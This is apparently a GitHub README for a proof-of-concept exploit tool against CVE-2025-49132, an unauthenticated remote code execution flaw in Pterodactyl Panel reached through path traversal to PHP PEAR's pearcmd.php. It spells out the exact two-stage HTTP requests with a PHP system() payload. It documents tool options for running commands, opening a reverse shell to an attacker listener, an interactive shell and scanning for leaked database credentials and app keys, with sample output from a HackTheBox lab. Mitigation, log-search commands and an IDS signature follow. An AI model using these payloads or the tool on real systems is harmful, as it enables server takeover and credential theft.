- Overview
- Vulnerability Details
- Technical Analysis
- Exploit Flow
- Installation
- Usage
- Examples
- Mitigation
- Disclaimer
- References
- Author
This repository contains a proof-of-concept (PoC) exploit for CVE-2025-49132, a critical unauthenticated remote code execution vulnerability in Pterodactyl Panel versions prior to 1.11.11.
Pterodactyl Panel is a free, open-source game server management panel built with PHP. The vulnerability allows an unauthenticated attacker to execute arbitrary system commands on the target server through improper handling of the /locales/locale.json endpoint combined with PHP PEAR's pearcmd.php functionality.
- CVE ID: CVE-2025-49132
- CVSS Score: 10.0 (Critical)
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- CWE: CWE-94: Improper Control of Generation of Code ('Code Injection')
- Affected Versions: Pterodactyl Panel < 1.11.11
- Attack Complexity: Low
- Privileges Required: None (Unauthenticated)
- User Interaction: None
PHP PEAR (PHP Extension and Application Repository) is a framework and distribution system for reusable PHP components. It provides a command-line tool (pearcmd.php) that can be used to manage PEAR packages.
The pearcmd.php file processes commands through URL parameters, and when combined with path traversal, it can be leveraged to:
- Create arbitrary PHP files on the system
- Execute those files through the web server
The vulnerability exists because:
- Unvalidated Path Traversal: The
localeparameter in/locales/locale.jsonallows path traversal without proper validation - Direct File Inclusion: The application directly includes files based on user-controlled input
- PEAR Command Injection: The
pearcmd.phpscript accepts the+config-createcommand which can write arbitrary PHP files - Unauthenticated Access: The vulnerable endpoint doesn't require authentication
An attacker can:
- Use path traversal to reach the PEAR installation directory
- Abuse the
config-createcommand to write malicious PHP code to/tmp - Execute the malicious PHP file through the same endpoint
- Achieve full remote code execution as the web server user
The exploit works in two stages:
GET /locales/locale.json?+config-create+/&locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&<?=system('id')?>+/tmp/payload.php HTTP/1.1
Host: target.comBreakdown:
+config-create+/- Invokes PEAR's config creation functionalitylocale=../../../../../../usr/share/php/PEAR- Path traversal to PEAR directorynamespace=pearcmd- Targets thepearcmd.phpfile<?=system('id')?>+/tmp/payload.php- PHP payload and destination file
GET /locales/locale.json?locale=../../../../../../tmp&namespace=payload HTTP/1.1
Host: target.comBreakdown:
locale=../../../../../../tmp- Path traversal to/tmpdirectorynamespace=payload- Includes and executespayload.php
The exploit requires sending special characters (<, >, ?, =) in the URL without encoding them. If these characters are URL-encoded:
<?=system('id')?>becomes%3C%3F%3Dsystem%28%27id%27%29%3F%3E- PEAR interprets this as literal text instead of PHP code
- The PHP tags are not recognized, preventing code execution
graph TD
A[Attacker] -->|1. Path Traversal Request| B[locale.json]
B -->|2. Traverse to PEAR| C[pearcmd.php]
C -->|3. config-create Command| D[Write PHP Payload]
D -->|4. Create File| E[payload.php]
E -->|5. File Created| F[Server Filesystem]
A -->|6. Execution Request| G[locale.json]
G -->|7. Traverse to tmp| E
E -->|8. Include and Execute| H[PHP Interpreter]
H -->|9. System Command| I[Shell Command]
I -->|10. Command Output| A
style A fill:#ff6b6b
style B fill:#4ecdc4
style C fill:#ffe66d
style E fill:#ff6b6b
style H fill:#ff6b6b
style I fill:#ff6b6b
sequenceDiagram
participant Attacker
participant Web Server
participant PEAR
participant Filesystem
participant PHP Engine
Attacker->>Web Server: GET locale.json with config-create
Web Server->>PEAR: Path Traversal to pearcmd
PEAR->>Filesystem: Create payload.php
Filesystem-->>Attacker: 200 OK
Attacker->>Web Server: GET locale.json with payload namespace
Web Server->>Filesystem: Path Traversal to payload.php
Filesystem->>PHP Engine: Include payload
PHP Engine->>PHP Engine: Execute system command
PHP Engine-->>Attacker: Command Output RCE
- Python 3.6 or higher
requestslibrary
git clone https://github.com/xffsec/CVE-2025-49132_PEAR_METHOD.git
cd CVE-2025-49132_PEAR_METHODpip3 install -r requirements.txtOr manually:
pip3 install requestspython3 poc.py -H <target_host> -c "<command>"# On attacker machine, start listener
nc -lvnp 4444
# Execute exploit with reverse shell
python3 poc.py -H <target_host> -r <your_ip>:4444python3 poc.py -H <target_host> --shellpython3 poc.py -H <target_host> --fuzzpython3 poc.py -H <target_host> --scanChecks for CVE-2025-49132 via config leaks (database credentials, app key).
python3 poc.py -H <target_host> -c "whoami" -p "/opt/pear"python3 poc.py -H <target_host> -c "id" -vShows detailed progress (payload creation, PEAR path, execution status).
usage: poc.py [-h] -H HOST [-c COMMAND] [-r REVERSE_SHELL] [--shell] [--fuzz] [--scan]
[-p PEAR_PATH] [-e ENDPOINT] [--ssl] [--timeout TIMEOUT] [-v]
optional arguments:
-h, --help show this help message and exit
-H HOST, --host HOST Target host (e.g., 192.168.1.100 or example.com)
-c COMMAND Command to execute on target system
-r REVERSE_SHELL Reverse shell (format: LHOST:LPORT)
--shell Interactive pseudo-shell mode
--fuzz Fuzz for PEAR installation paths
--scan Scan target for vulnerability (config leaks)
-p PEAR_PATH Custom PEAR path (default: /usr/share/php/PEAR)
-e ENDPOINT Vulnerable endpoint (default: /locales/locale.json)
--ssl Use HTTPS
--timeout TIMEOUT Request timeout in seconds (default: 10)
-v, --verbose Verbose progress output
$ python3 poc.py -H panel.pterodactyl.htb -c "id"
[CVE-2025-49132] Pterodactyl Panel RCE via PHP PEAR
[+] Command Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)Use -v for verbose output (payload details, PEAR path, etc.).
# Terminal 1: Start listener
$ nc -lvnp 4444
listening on [any] 4444 ...
# Terminal 2: Execute exploit
$ python3 poc.py -H panel.pterodactyl.htb -r 10.10.14.5:4444
╔══════════════════════════════════════╗
║ CVE-2025-49132 - Pterodactyl RCE ║
╚══════════════════════════════════════╝
[!] Make sure your listener is running: nc -lvnp 4444
# Terminal 1: Receive connection
connect to [10.10.14.5] from (UNKNOWN) [panel.pterodactyl.htb] 45678
www-data@pterodactyl:/var/www/pterodactyl$$ python3 poc.py -H panel.pterodactyl.htb --shell
shell> whoami
www-data
shell> pwd
/var/www/pterodactyl
shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell> exit$ python3 poc.py -H panel.pterodactyl.htb --fuzz
╔══════════════════════════════════════╗
║ CVE-2025-49132 - Pterodactyl RCE ║
╚══════════════════════════════════════╝
[+] Found 3 potential PEAR installation(s):
/usr/share/php/PEAR
/usr/share/pear
/usr/local/lib/php/PEAR
[*] Use -p flag with one of these paths for exploitationUse -v to see per-path fuzz progress.
$ python3 poc.py -H panel.pterodactyl.htb --scan
╔══════════════════════════════════════╗
║ CVE-2025-49132 - Pterodactyl RCE ║
╚══════════════════════════════════════╝
[*] Scanning: http://panel.pterodactyl.htb/locales/locale.json
-------------------------------------------------------
[+] VULNERABLE - Database credentials leaked
Host: 127.0.0.1
Port: 3306
Database: panel
Username: pterodactyl
Password: ********
Connection: pterodactyl:********@127.0.0.1:3306/panel
[+] VULNERABLE - App configuration leaked
App Key: base64{...}
[!] SECURITY WARNING: APP_KEY exposed!
-------------------------------------------------------
[+] Target is VULNERABLE to CVE-2025-49132-
Update Pterodactyl Panel
cd /var/www/pterodactyl php artisan p:upgradeUpdate to version 1.11.11 or later.
-
Disable Vulnerable Endpoint (Temporary Workaround)
Add to your web server configuration:
Apache (.htaccess):
<Files "locale.json"> Order Allow,Deny Deny from all </Files>
Nginx:
location ~* /locales/locale\.json { deny all; return 403; }
Note: This will break localization features.
-
Web Application Firewall (WAF)
Implement WAF rules to block path traversal attempts:
SecRule REQUEST_URI "@contains ../" "id:1000,phase:1,deny,status:403" SecRule ARGS "@contains ../" "id:1001,phase:2,deny,status:403"
- Input Validation: Implement strict validation for the
localeandnamespaceparameters - Path Sanitization: Use
realpath()to resolve and validate file paths - Whitelist Approach: Only allow specific, predefined locale values
- Authentication: Require authentication for locale endpoints
- Security Audits: Regular security assessments and penetration testing
Log Analysis - Look for suspicious patterns:
# Apache/Nginx access logs
grep "locale.json" /var/log/apache2/access.log | grep "\.\."
grep "pearcmd" /var/log/apache2/access.log
grep "config-create" /var/log/apache2/access.log
# Look for payload files
find /tmp -name "payload.php" -o -name "*.php" -mtime -1IDS/IPS Signatures:
alert http any any -> any any (msg:"CVE-2025-49132 PEAR RCE Attempt";
content:"/locales/locale.json"; http_uri;
content:"pearcmd"; http_uri;
content:"config-create"; http_uri;
sid:1000001; rev:1;)
FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY
This proof-of-concept exploit is provided for educational purposes and authorized security testing only. The author assumes no liability for misuse or damage caused by this program.
- ✅ DO: Use this tool for authorized penetration testing and security research
- ✅ DO: Use this tool on systems you own or have explicit permission to test
- ✅ DO: Use this tool to verify patches and security controls
- ❌ DON'T: Use this tool against systems without explicit authorization
- ❌ DON'T: Use this tool for malicious purposes
- ❌ DON'T: Deploy this tool in production environments without proper controls
Unauthorized access to computer systems is illegal. Users are responsible for ensuring compliance with applicable laws and regulations.
- CVE-2025-49132 - NVD
- GitHub Advisory: GHSA-24wv-6c99-f843
- Pterodactyl Panel Security Advisory
- PHP PEAR Documentation
- CWE-94: Code Injection
xffsec
| Contact |
|---|
| GitHub: @xffsec |
| Email: xffsec@gmail.com |
This project is licensed under the MIT License - see the LICENSE file for details.
Contributions, issues, and feature requests are welcome! Feel free to open an issue or submit a pull request.
- Pterodactyl Panel development team for their responsible disclosure process
- The security research community
- HackTheBox for providing a safe environment to practice these techniques